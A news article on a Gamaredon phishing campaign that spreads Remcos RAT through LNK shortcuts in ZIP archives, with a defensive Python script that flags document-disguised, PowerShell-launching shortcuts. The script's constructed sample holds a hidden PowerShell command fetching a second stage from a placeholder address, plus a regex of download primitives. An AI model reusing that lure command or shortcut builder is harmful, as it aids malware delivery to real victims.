Ukrainian organizations are once again in the crosshairs of a phishing campaign distributing Remcos RAT, a remote access trojan used for espionage and data theft. According to Cisco Talos, the attacks are believed to originate from Gamaredon, a Russian state-linked hacking group with a long history of targeting Ukraine.
The campaign uses war-related themes as bait: the attackers embed Windows shortcut (LNK) files inside ZIP archives, disguised to look like Microsoft Office documents referencing troop movements in Ukraine. These archives are likely delivered via phishing emails that aim to trick recipients into opening them.
Once opened, the LNK files execute PowerShell scripts that reach out to geo-fenced servers in Russia and Germany. Because the servers only answer requests that appear to come from the targeted region, analysts fetching the payload from elsewhere may see nothing. These servers host the next-stage payload, another ZIP archive containing a malicious DLL, which is executed via DLL side-loading: a legitimate application loads the attacker's DLL from its own directory in place of the library it expects. This technique allows the attackers to run a decrypted copy of Remcos RAT while displaying a decoy document to keep the victim unaware.
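The chain above (a ZIP carrying a shortcut that masquerades as a document and launches PowerShell to fetch a second stage) can be triaged at the mail gateway or in a sandbox before anything runs. The script below is an added example written for this page; it is not Cisco Talos code and does not use any real artifact from the campaign. It parses the ShellLinkHeader and StringData fields of MS-SHLLINK (the Windows shortcut format) and flags LNK entries that either carry a double extension such as `.docx.lnk` or launch PowerShell and a download primitive. The archive it scans is constructed inline: the Russian file name, the `powershell.exe` relative path and the `192.0.2.10` TEST-NET address are assumptions chosen to resemble the lure described, not values taken from the report.

```python
import io
import re
import struct
import zipfile

# MS-SHLLINK constants: fixed 0x4C-byte header, CLSID 00021401-0000-0000-C000-000000000046
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_REL_PATH, HAS_WORK_DIR, HAS_ARGS, HAS_ICON = 0x04, 0x08, 0x10, 0x20, 0x40
IS_UNICODE = 0x80
STRING_FIELDS = (("name", HAS_NAME), ("relative_path", HAS_REL_PATH),
                 ("working_dir", HAS_WORK_DIR), ("arguments", HAS_ARGS),
                 ("icon_location", HAS_ICON))

DOC_EXTS = (".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".rtf")
# Launch and download primitives commonly seen in LNK-to-PowerShell chains
PS_PATTERN = re.compile(
    r"(powershell|pwsh|-enc\w*|FromBase64String|DownloadString|DownloadFile|"
    r"Invoke-WebRequest|\biwr\b|Invoke-Expression|\biex\b|Start-Process)", re.I)


def build_lnk(relative_path, arguments):
    """Build a minimal shell link carrying only RelativePath and Arguments.
    Used here only to construct sample input; it is not a general LNK writer."""
    flags = HAS_REL_PATH | HAS_ARGS | IS_UNICODE
    # HeaderSize, CLSID, LinkFlags, FileAttributes(ARCHIVE), 3 FILETIMEs, FileSize,
    # IconIndex, ShowCommand(SW_SHOWNORMAL), HotKey, Reserved1/2/3
    header = struct.pack("<I16sIIQQQIIIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)

    def ustr(s):  # StringData: CountCharacters (u16) + UTF-16LE characters
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + ustr(relative_path) + ustr(arguments)


def parse_lnk_strings(data):
    """Return the StringData fields of a shell link, skipping the optional
    LinkTargetIDList and LinkInfo structures that precede them."""
    hdr_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if hdr_size != LNK_HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("not a shell link")
    off = LNK_HEADER_SIZE
    if flags & HAS_ID_LIST:
        (idlist_size,) = struct.unpack_from("<H", data, off)
        off += 2 + idlist_size
    if flags & HAS_LINK_INFO:
        (linkinfo_size,) = struct.unpack_from("<I", data, off)
        off += linkinfo_size
    fields = {}
    for name, bit in STRING_FIELDS:
        if not flags & bit:
            continue
        (count,) = struct.unpack_from("<H", data, off)
        off += 2
        if flags & IS_UNICODE:
            fields[name] = data[off:off + count * 2].decode("utf-16-le")
            off += count * 2
        else:
            fields[name] = data[off:off + count].decode("cp1252", "replace")
            off += count
    return fields


def triage_archive(zip_bytes):
    """Flag LNK entries inside a ZIP that masquerade as documents via a double
    extension or that launch PowerShell / a download primitive."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            if not name.lower().endswith(".lnk"):
                continue
            reasons = []
            if name[:-4].lower().endswith(DOC_EXTS):
                reasons.append("document-looking name with a trailing .lnk extension")
            try:
                fields = parse_lnk_strings(zf.read(info))
            except ValueError as exc:
                fields = {}
                reasons.append(f"malformed shell link: {exc}")
            command = " ".join(v for v in (fields.get("relative_path"),
                                           fields.get("arguments")) if v)
            if PS_PATTERN.search(command):
                reasons.append("shortcut launches PowerShell or a download primitive")
            if reasons:
                findings.append({"entry": name, "command": command, "reasons": reasons})
    return findings


def build_sample_archive():
    """Constructed sample (not a real Gamaredon artifact): one decoy-named LNK that
    runs PowerShell to fetch a second stage from a TEST-NET address, plus one
    harmless shortcut to notepad.exe that should not be flagged."""
    lure = build_lnk(
        r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        r'-w hidden -ep bypass -c "Invoke-WebRequest http://192.0.2.10/stage2.zip -OutFile $env:TEMP\s.zip"')
    benign = build_lnk(r"..\..\..\Windows\notepad.exe", "")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Перемещение войск.docx.lnk", lure)  # assumed lure name
        zf.writestr("readme.lnk", benign)
    return buf.getvalue()


if __name__ == "__main__":
    for finding in triage_archive(build_sample_archive()):
        print(finding["entry"], "->", finding["reasons"])
        print("   ", finding["command"])
```

Only the decoy-named entry is reported, with both reasons, while the notepad shortcut passes. Real samples often carry an IDList and LinkInfo block before the strings; the parser skips those by their declared sizes, which is why it works on a full shortcut and not only on the stripped-down sample built here.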
Cisco Talos researcher Guilherme Venere notes that the malicious files carry Russian-language file names, a detail that reinforces the social engineering. The operation has been attributed with moderate confidence to Gamaredon, a group associated with Russia's Federal Security Service (FSB) and also tracked under names such as Primitive Bear, Trident Ursa, and UAC-0010.
Gamaredon has been active since at least 2013, primarily targeting Ukrainian government entities, NGOs, and military personnel. The group's tactics include rapid malware deployment, simple phishing schemes, and consistent infrastructure reuse, traits also visible in this latest campaign.
The connection to Gamaredon was reinforced through analysis of the two systems used to create the LNK files. Shortcut files embed metadata about the machine on which they were built, such as the host name and volume identifiers in the tracker data block, and the same machines have appeared in past attacks attributed to the group, offering a forensic link back to their infrastructure.
In parallel with this operation, researchers at Silent Push have uncovered another Russia-aligned phishing campaign, this time targeting pro-Ukrainian individuals within Russia. These campaigns use website impersonation and email forms to gather sensitive personal data under the guise of legitimate entities such as the CIA, the Russian Volunteer Corps, Legion Liberty, and the "I Want to Live" hotline for Russian soldiers seeking to surrender.
These fake websites, hosted with a bulletproof provider known as Nybula LLC, are designed to collect personal data, including political beliefs, physical fitness, and behavioral habits. The phishing forms use platforms such as Google Forms and direct email exchanges to extract this information from unsuspecting users.
Silent Push linked the four phishing clusters by their shared infrastructure and objective: data collection from individuals sympathetic to Ukraine, likely in an effort to identify, monitor, or pressure them.
While the tools and targets vary, both operations point to Russia-linked cyber actors intensifying information warfare tactics against Ukraine and its allies. From remote access trojans like Remcos to honeypot phishing sites impersonating Western intelligence agencies, the digital front of the Russo-Ukrainian war continues to evolve in sophistication and scale.